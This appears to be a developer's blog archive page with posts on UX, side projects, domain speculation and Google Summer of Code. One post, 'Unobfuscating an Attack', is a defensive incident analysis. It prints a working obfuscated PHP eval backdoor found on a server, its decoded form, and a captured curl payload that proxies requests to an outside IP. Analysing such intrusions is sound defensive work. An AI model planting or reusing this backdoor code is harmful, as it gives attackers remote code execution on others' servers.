Fail Early, Fail Often

June 1st, 2011
Share

I have been reading some user experience books lately. While doing so, I came across this gem:

The ceramics teacher announced on opening day that he was dividing the class into two groups. All those on theleft side of the studio, he said, would be graded solely on the quantity of work they produced, all those on the rightsolely on its quality. His procedure was simple: on the final day of class he would bring in his bathroom scalesand weigh the work of the “quantity” group: fifty pounds of pots rated an “A”, forty pounds a “B”, and so on. Thosebeing graded on “quality,” however, needed to produce only one pot—albeit a perfect one—to get an “A.” Well,came grading time and a curious fact emerged: the works of highest quality were all produced by the group beinggraded for quantity. It seems that while the “quantity” group was busily churning out piles of work—and learningfrom their mistakes—the “quality” group had sat theorizing about perfection, and in the end had little more toshow for their efforts than grandiose theories and a pile of dead clay. (Bayles & Orland 2001; p. 29)

Announcing Viral Landing Page

March 2nd, 2011
Share

I have been working on a few projects which require a landing page over the past couple of months, and this has come to the forefront of my thoughts more recently. As a Startup Weekend alumnus, I was pretty excited to see that launchrock was fully launched and gaining quite a bit of traction. One problem, though, is that I would have to sign up for each project and then promote the links. I don’t like to post too many links on my Twitter and/or Facebook accounts, so I decided against this. If you’re not familiar with the concept, here is an excerpt from the description on the Github repo:

When a user submits their e-mail address, it will immediately be recorded to the
local database. The user will then be shown "sharing" icons from Facebook and
Twitter. Each successful click or referral will be recorded to the database for
that user. This makes it easier for you to allow earlier access to people who are
driving traffic to your site.

The next route was to implement something similar, which I did over the past couple of days. The result is viral-landing-page (very original name, I know), which can be found in my Github repositories immediately. Viral-landing-page was written in Ruby on Rail because, well, I love the framework. For Javascript, I chose jQuery for similar reasons.

Viral-landing-page far from polished, but it should be good enough to begin using immediately. I chose to license it under the BSD open source license, which is quite permissive. While it isn’t required, I’d like to know who is using this software (and early access to your startup =D). You can comment on this blog post, or contact me via any other methods. I will be actively adding features (maybe an admin viewer) as I use the project more and more for my own needs. Feel free to fork and push back any changes!

Export Google Chrome passwords to Keepass

January 1st, 2011
Share

I have recently been complementing the power of Keepass with Dropbox, which allows me to share and access my logins and passwords anywhere with an internet connection while still storing them in a secure manner.  Thanks to the KeepassDroid application, this even includes my phone.

Since I began using Keepass, I have been looking for a way to import those pesky web application passwords into Keepass.  Since I have a different login and password for essentially every site I visit, managing and remembering these has been a huge problem in the past. With multiple hundreds of unique login/password combinations, doing this by hand was not an option.  This morning the problem came to a head and I decided to do something about it.

Since Keepass allows importation from it’s own XML format, the building blocks for an export/import were already there. I have been learning Ruby lately, so I decided I would whip up a quick script to export my Chrome passwords.

After a bit of hacking, I finished chrome2keepass this morning and you can find it at its Github Repository.

Local(-ish) Startup Activity

November 4th, 2010
Share

It seems that the Windsor/Metro Detroit area is finally getting some startup assistance love.

No great incubator yet, but we do have a few upcoming events in the area:

This is a great chance for local startup-minded people to network and, as I like to say, increase their geek circle.  If you are one of these people, get out there and get involved.

Unobfuscating an Attack

July 13th, 2010
Share

Having experienced some ‘weird’ traffic the other day, a client contacted me regarding this problem.  One of the datacenters we deal with contacted my client and sent him the following logs from an attack that seems to occured from his server:

access.log:xxx.xxx.xxx.xxx - - [01/Jul/2010:12:15:03 +0000] "GET /wp-login.php HTTP/1.1" 404 2533 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
access.log:xxx.xxx.xxx.xxx - - [01/Jul/2010:12:15:03 +0000] "GET /old/wp-login.php HTTP/1.1" 404 2533 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
access.log:xxx.xxx.xxx.xxx - - [01/Jul/2010:12:15:04 +0000] "GET /cms/wp-login.php HTTP/1.1" 404 2533 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
access.log:xxx.xxx.xxx.xxx - - [01/Jul/2010:12:15:04 +0000] "GET /wp-login.php HTTP/1.1" 404 2537 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
access.log:xxx.xxx.xxx.xxx - - [01/Jul/2010:12:15:05 +0000] "GET /wp-login.php HTTP/1.1" 404 2538 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
access.log:xxx.xxx.xxx.xxx - - [01/Jul/2010:12:15:05 +0000] "GET /blog/wp-login.php HTTP/1.1" 404 2537 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
access.log:xxx.xxx.xxx.xxx - - [01/Jul/2010:12:15:06 +0000] "GET /blog/wp-login.php HTTP/1.1" 404 2533 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
access.log:xxx.xxx.xxx.xxx - - [01/Jul/2010:12:15:06 +0000] "GET /blog_old/wp-login.php HTTP/1.1" 404 2533 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
access.log:xxx.xxx.xxx.xxx - - [01/Jul/2010:12:15:06 +0000] "GET /blog-old/wp-login.php HTTP/1.1" 404 2533 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
access.log:xxx.xxx.xxx.xxx - - [01/Jul/2010:12:15:07 +0000] "GET /blog/wp/wp-login.php HTTP/1.1" 404 2533 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

Obviously, the IPs have been removed to protect the innocent.  What we can see from this log output is that there is an obvious scan of hackable WordPress installations happening — and they look to come from our server.

After some further inspection of the server, it looks as if an ‘attacker’ uploaded a PHP file to their account and was now using it to scour the internet for hackable WordPress installs.  A remote machine would send requests to a group of servers hosting this PHP file:

$_fcxxxcc="\x70\x72\x65\x67\x5f\x72\x65\x70\x6c\x61\x63\x65";
$_fcxxxcc("\x7c\x2e\x7c\x65","\x65\x76\x61\x6c\x28\x27\x65\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x22aWYobWQ1KCRfU0VSVkVSWydIVFRQX1FVT1RFJ10pPT0nZTY2ZTZjYWRkNmUxM2VmZWE1NGVkNTBjMGViMmQzMmInIGFuZCBpc3NldCgkX1NFUlZFUlsnSFRUUF9YX0NPREUnXSkpIEBldmFsKEBiYXNlNjRfZGVjb2RlKHN0cnJldihAJF9TRVJWRVJbJ0hUVFBfWF9DT0RFJ10pKSk7\x22\x29\x29\x3b\x27\x29",'.');

I have to give it to them, at least they obfuscated the code.  It took a while before I realized the extent of their hidden code.  Unobfuscating this file gives us:

$_fcxxxcc="preg_replace";
preg_replace("|.|e","eval('eval(base64_decode("aWYobWQ1KCRfU0VSVkVSWydIVFRQX1FVT1RFJ10pPT0nZTY2ZTZjYWRkNmUxM2VmZWE1NGVkNTBjMGViMmQzMmInIGFuZCBpc3NldCgkX1NFUlZFUlsnSFRUUF9YX0NPREUnXSkpIEBldmFsKEBiYXNlNjRfZGVjb2RlKHN0cnJldihAJF9TRVJWRVJbJ0hUVFBfWF9DT0RFJ10pKSk7"));')",'.')

Base 64 decoding this string gives us:

if(md5($_SERVER['HTTP_QUOTE'])=='e66e6cadd6e13efea54ed50c0eb2d32b'  and isset($_SERVER['HTTP_X_CODE']))
    @eval(@base64_decode(strrev(@$_SERVER['HTTP_X_CODE'])));

Finally, we’re getting somewhere!

Brief inspection of this code shows that the attackers are sending a payload which gets interpreted by the local system.  But, what kind of payload are they sending to their script?  Since this file was being called quite periodically, dumping the information to a text file gives us all of the information we are looking for.  After a day, I came back to check on the script to find payload that looks like this (decoding and comments by me):

header("X_GZIP: TRUE");
header("X_MD5: 8b72825b0b211b07f8378013cbfb0d17");
error_reporting(E_ALL); ini_set("display_errors",1); $cr=curl_init();
curl_setopt($cr, 13, unserialize(base64_decode("aToxNTs="))); // i:15;
curl_setopt($cr, 19913, unserialize(base64_decode("czoxOiIxIjs="))); // s:1:"1";
curl_setopt($cr, 42, unserialize(base64_decode("czoxOiIxIjs="))); // s:1:"1";
curl_setopt($cr, 53, unserialize(base64_decode("czoxOiIwIjs="))); // s:1:"1";
curl_setopt($cr, 52, unserialize(base64_decode("aTowOw=="))); // i:0;
curl_setopt($cr, 19914, unserialize(base64_decode("czoxOiIxIjs="))); // s:1:"1";
curl_setopt($cr, 64, unserialize(base64_decode("czoxOiIwIjs="))); // s:1:"1";
curl_setopt($cr, 81, unserialize(base64_decode("czoxOiIwIjs="))); // s:1:"1";
curl_setopt($cr, 10023, unserialize(base64_decode("YTo5OntpOjA7czoxMToiQWNjZXB0OiAqLyoiO2k6MTtzOjIyOiJBY2NlcHQtTGFuZ3VhZ2U6IGVuLXVzIjtpOjI7czoyMjoiQ29ubmVjdGlvbjoga2VlcC1hbGl2ZSI7aTozO3M6MTIwOiJVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA3LjA7IFdpbmRvd3MgTlQgNS4xOyBBVCZUIENTTTcuMDsgWVBDIDMuMi4wOyAuTkVUIENMUiAxLjEuNDMyMjsgeXBsdXMgNS4xLjA0YikiO2k6NDtzOjg6IkV4cGVjdDogIjtpOjU7czoxNzoiQWNjZXB0LUVuY29kaW5nOiAiO2k6NjtzOjE1OiJLZWVwLUFsaXZlOiAxMTUiO2k6NztzOjg6IkNvb2tpZTogIjtpOjg7czoxNDk6IlJlZmVyZXI6IGh0dHA6Ly90cmFuc2xhdGUuZ29vZ2xlLmNvbS90cmFuc2xhdGU/aGw9ZW4mc2w9ZW4mdGw9ZnImdT1odHRwJTNBJTJGJTJGODkuMTQ5LjI0Mi4xMjIlMkZkYXRhJTJGMjk1NjA5M185M2NmODdjNGM1NGFlNjVjNjc0ZTlkOWJjOTQ3NjU3OS5odG1sIjt9")));
/* a:9:{i:0;s:11:"Accept: */*";i:1;s:22:"Accept-Language: en-us";i:2;s:22:"Connection: keep-alive";i:3;s:120:"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; AT&T CSM7.0; YPC 3.2.0; .NET CLR 1.1.4322; yplus 5.1.04b)";i:4;s:8:"Expect: ";i:5;s:17:"Accept-Encoding: ";i:6;s:15:"Keep-Alive: 115";i:7;s:8:"Cookie: ";i:8;s:149:"Referer: http://translate.google.com/translate?hl=en&sl=en&tl=fr&u=http%3A%2F%2F89.149.242.122%2Fdata%2F2956093_93cf87c4c54ae65c674e9d9bc9476579.html";} */
curl_setopt($cr, 10102, unserialize(base64_decode("czowOiIiOw=="))); // s:0:"";
curl_setopt($cr, 47, unserialize(base64_decode("aTowOw=="))); // i:0;
curl_setopt($cr, 10002, unserialize(base64_decode("czoxNDA6Imh0dHA6Ly90cmFuc2xhdGUuZ29vZ2xlLmNvbS90cmFuc2xhdGU/aGw9ZW4mc2w9ZW4mdGw9ZnImdT1odHRwJTNBJTJGJTJGODkuMTQ5LjI0Mi4xMjIlMkZkYXRhJTJGMjk1NjA5M185M2NmODdjNGM1NGFlNjVjNjc0ZTlkOWJjOTQ3NjU3OS5odG1sIjs=")));
// s:140:"http://translate.google.com/translate?hl=en&sl=en&tl=fr&u=http%3A%2F%2F89.149.242.122%2Fdata%2F2956093_93cf87c4c54ae65c674e9d9bc9476579.html";
$response=curl_exec($cr);
$md5_error=md5("error");$md5_content=md5("content");$md5_info=md5("info");
if(is_bool($response) and $response == false) {
    echo "<$md5_error>".curl_errno($cr)."|".curl_error($cr)."";
    exit;
}
echo "<$md5_info>".serialize(curl_getinfo($cr))."";
if(function_exists("gzdeflate") and base64_encode(gzdeflate(md5("time"),9))=="MzBPTjazNEmyTDJOSzYzNjM3NEhLNLBIMrM0Mko2MUoCAA=="){
    $response="GZIP|".base64_encode(gzdeflate($response,9));
}
echo "<$md5_content>$response";
exit;

The definition of the curl_setopt call is as follows:

bool curl_setopt ( resource $ch , int $option , mixed $value )

Let’s break down all of the Curl options we are setting here.  Even the curl_setopt calls are obfuscated in the xcode that we receive, using the integer value instead of the constants:

  • Option 13 (CURLOPT_TIMEOUT => 15): Sets the timeout for the Curl request to 15 seconds.
  • Option 19913 (CURLOPT_RETURNTRANSFER => “1”): Returns the value of curl_exec as a string.
  • Option 42 (CURLOPT_HEADER => “1”): Includes the header in the output.
  • Option 53 (CURLOPT_TRANSFERTEXT => “1”): Uses ASCII mode for FTP transfers.
  • Option 52 (CURLOPT_FOLLOWLOCATION => 0): Does not follow ‘Location:’ header fields.
  • Option 19914 (CURLOPT_BINARYTRANSFER => “1”): Returns raw output in conjunction with option 19913 (CURLOPT_RETURNTRANSFER)
  • Option 64 (CURLOPT_SSL_VERIFYPEER => “1”): Verifies the site’s SSL certificate to be valid.
  • Option 81 (CURLOPT_SSL_VERIFYHOST => “1”): Verifies the correct SSL hostname for the certificate.
  • Option 10023 (CURLOPT_HTTPHEADER): Sets the HTTP header sent as follows:
    • “Accept: */*”: Specifies that all media is acceptable for response from the HTTP request
    • “Accept-Language: en-us”: Specifies that we are looking for an English return.
    • “Connection: keep-alive”: Specifies that we want a persistent connection (multiple responses/downloads in one thread of the server essentially).
    • “User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; AT&T CSM7.0; YPC 3.2.0; .NET CLR 1.1.4322; yplus 5.1.04b)”: A bogus user agent
    • “Expect: “: Indicates that no behavior is required by the client.
    • “Accept-Encoding: “: Indicates that we accept all encoding.
    • “Keep Alive: 115″: Sets a keep-alive timeout of 115.
    • “Referer: <cut for clarity:  see in source above>”: Sets a seemingly bogus referer, although this may be legit in some cases.
  • Option 10102 (CURLOPT_ENCODING => “”): If this is set to “”, a header that accepts all “Accept Encoding” header values is sent.
  • Option 47 (CURLOPT_POST => 0): We are not doing a HTTP post.
  • Option 10002 (CURLOPT_URL): Sets the URL to fetch.

If you would like to see a mapping of integer=>constant name for the curl curl options in PHP, you can find that here.

It looks like in this case, the attacker was using Google Translate to fetch a website and translate it into another language.  In this case, the payload of the attack is not as important as the implications of finding this file and the outcome it could have on your server and the users hosted on it.

I think the moral of the story here is to watch out for what your users may be uploading to your servers. This two line file essentially turned one of our machines into an open proxy server for whoever was privy to the URL of this script. It is better to be proactive in searching for these than it is to sit around and wait for a datacenter to give you a ring. Of course, you can’t always find them in time.

References and Attributions:

  1. PHP: curl_setopt
  2. RFC2616: Hypertext Transfer Protocol — HTTP/1.1
  3. Chomped computer image at the top of the article is from the Tango project, modified by slady. Licensed under the Creative Commons-BY-SA-2.5 License.

Double Dipping into Domaining

June 4th, 2010
Share

When I first read Andrew Badr‘s post on his tests with domain squatting^W speculation, I was immediately interested in the methods that he used.  Having checked out multiple domain speculation websites in the past, I knew that there were some improvements to be had in the offerings that people put forth.

Coincidentally, I have been reading up on Python lately and have become pretty interested in the language.  For my first script implementation, I decided to explore the 4,4 space in English word .com domains.  I like this space because it is pretty common (facebook), and I believed that with so many possibilities there would be some great names available.

Andrew used a method that included some manual work, which I wanted to avoid.  I quickly found an English dictionary online and used the grep pattern “^….$” which would work fine for my simple case.  I ended up with 3903 4-letter English words.  This space (3903^2) was far too large to start sending queries out, and also too large to manually edit.  What to do?

I quickly decided that trends on each word was the way to go, and obtained some statistics on how common each word was.  After inserting each word and it’s relevance into a simple MySQL table, I was ready to begin hammering away to see what was available for registration.

Once I had this data, I stored a reference to each word and the combined relevance of the prefix and suffix in another table of the database.  According to my heuristics, I had the list of the most relevant domains with 2 four character words possible.

The results are pretty interesting, with many (what I would consider) top-term .com domains available.  Here are some of my favorites quickly off of the file (inb4registration):

  • thisholy.com
  • thatecho.com
  • homehide.com
  • homemeet.com
  • havethem.com

Can we do better?  Like Andrew, I also stored a counter for each time a 4-letter word was either a prefix or a suffix.  Tomorrow I will try using this information as a factor to my current heuristics.  I think the most major improvement possible would be to distribute these requests over a few different boxes (it’s definitely MapReduceable).  If you have any methods for improvement, I would like to hear them as well.  Leave a note in the comments section.

If there’s any interest, I will post my full list  (it’s hosted on my home computer).  There are massive possibilities to explore the 3,4 space and 4,3 space, I would love to hear from you if you begin your exploration in these spaces.

MTSec Initial Report

May 14th, 2009
Share

I was asked by Aaron Mavrinac to write a report about what exactly MTSec currently does in the code – summary of what the standard hooks are doing, list of orders, list of objects, etc.  For this report I focused mainly on the code itself, sort of the MTSec API as it stands now.  This means that I have read all of the MTSec code already and have a good idea of what is happening within it.  I plan to create a wiki page within the Thousand Parsec Wiki for others to be able to update my work as they see fit.  Feel free to read my report on the MTSec game module source.
Read the rest of this entry »

Let the Work Commence

May 6th, 2009
Share

I have officially started my work today for Thousand Parsec.  My GSoC mentor, Aaron Mavrinac, has outlined these items for me to complete in the next week or so:

1. Make a test commit to tpserver-cpp mtsec branch (add yourself to AUTHORS).

2. Read the TP protocol spec again, make sure you understand what each
thing is.

3. Read Part III of the ruleset development manual.

4. Write me a report about what exactly MTSec currently does in the
code – summary of what the standard hooks are doing, list of orders,
list of objects, etc.

I’ve completed task #1 and I am beginning the rest of the tasks.  My plan is to read the spec over again (I read it many times during the proposal stage) and complete these tasks by the end of the weekend.

My 2009 Thousand Parsec Proposal

May 4th, 2009
Share

I mentioned previously that I would be posting my complete proposal to this blog. Today, I have gone ahead with that and it is viewable in this post.  Throughout the summer as I become more acclimated to Thousand Parsec and the Google Summer of Code process I will be posting regarding possible areas for improvement for this proposal.
Read the rest of this entry »

How To Get Accepted Into Google Summer Of Code (GSoC)

April 30th, 2009
Share

There have been various discussions in both the GSoC mailing list and official IRC channel regarding improving your chances of getting into GSoC.  Since the 2009 process has already finished, I have these suggestions for 2010 students and beyond:

  • Be active in the community.
  • Write a good proposal, submit it early.
  • Subscribe to your update notifications for your proposal.
  • Update your proposal.
  • Be active in the community.
  • Submit Patches.

Let’s break these criteria down further:
Read the rest of this entry »